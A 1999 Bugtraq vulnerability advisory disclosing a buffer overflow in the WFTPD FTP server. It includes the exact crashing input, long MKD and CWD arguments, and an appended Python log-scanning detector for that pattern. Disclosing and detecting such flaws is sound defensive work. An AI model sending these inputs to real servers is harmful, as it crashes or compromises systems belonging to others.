[12371] in bugtraq
WFTPD v2.40 FTPServer remotely exploitable buffer overflow
daemon@ATHENA.MIT.EDU (Luciano Martins)
Thu Oct 28 14:48:44 1999
Message-Id: <NCBBKFKDOLAGKIAPMILPOEFBCAAA.luck@ussrback.com>
Date: Thu, 28 Oct 1999 06:07:55 -0300
Reply-To: Luciano Martins <luck@USSRBACK.COM>
From: Luciano Martins <luck@USSRBACK.COM>
X-To: BUGTRAQ <bugtraq@securityfocus.com>
To: BUGTRAQ@SECURITYFOCUS.COM
We found a remotely exploitable buffer overflow vulnerability in the WFTPD
Server v2.34, v2.40 and earlier. This can result in a denial of service
and, at worst, in arbitrary code being executed on the system.
The vulnerabilities are the conjunction of two large commands, MKD and
CWD, when each is passed as its argument a string of exactly 255 characters.
If these two large commands are passed in order, the program crashes.
Tested on: Windows 98 / Windows NT
Example:
First command
MKD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Second command
CWD
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa
Crash.....Overflow.
Luck Martins
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
WWW.USSRBACK.COM
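
A defender-side check for the pattern in this advisory, added here as an example and not part of the original post: it scans FTP command log lines and flags MKD or CWD arguments of 255 characters or more, plus a long CWD that follows a long MKD from the same client. The log format (`<client> <VERB> <argument>`), the rule names and the sample lines are constructed assumptions.

```python
import re

LONG_ARG = 255            # argument length reported in the advisory
WATCHED = {"MKD", "CWD"}  # the two commands named in the advisory

# Assumed (constructed) log format: "<client> <VERB> <argument>"
LINE_RE = re.compile(r"^(\S+)\s+([A-Za-z]{3,4})(?:\s(.*))?$")


def scan(lines, threshold=LONG_ARG):
    """Return alerts as (client, rule, verb, arg_len) tuples.

    Rules (names are hypothetical):
      long-argument : MKD or CWD argument at or above the threshold
      mkd-then-cwd  : long CWD seen after a long MKD from the same client
    """
    alerts = []
    long_mkd_seen = set()  # clients that already sent an over-long MKD
    for raw in lines:
        m = LINE_RE.match(raw.rstrip("\r\n"))
        if not m:
            continue  # not a command line in the assumed format
        client, verb, arg = m.group(1), m.group(2).upper(), m.group(3) or ""
        if verb not in WATCHED or len(arg) < threshold:
            continue
        alerts.append((client, "long-argument", verb, len(arg)))
        if verb == "MKD":
            long_mkd_seen.add(client)
        elif client in long_mkd_seen:
            alerts.append((client, "mkd-then-cwd", verb, len(arg)))
    return alerts


# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    "192.0.2.10 USER anonymous",
    "192.0.2.10 MKD " + "a" * 255,
    "198.51.100.7 CWD /pub/incoming",
    "192.0.2.10 cwd " + "a" * 255,
    "198.51.100.7 CWD " + "b" * 300,
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The threshold is a parameter so it can be lowered to match the longest path a given server legitimately needs.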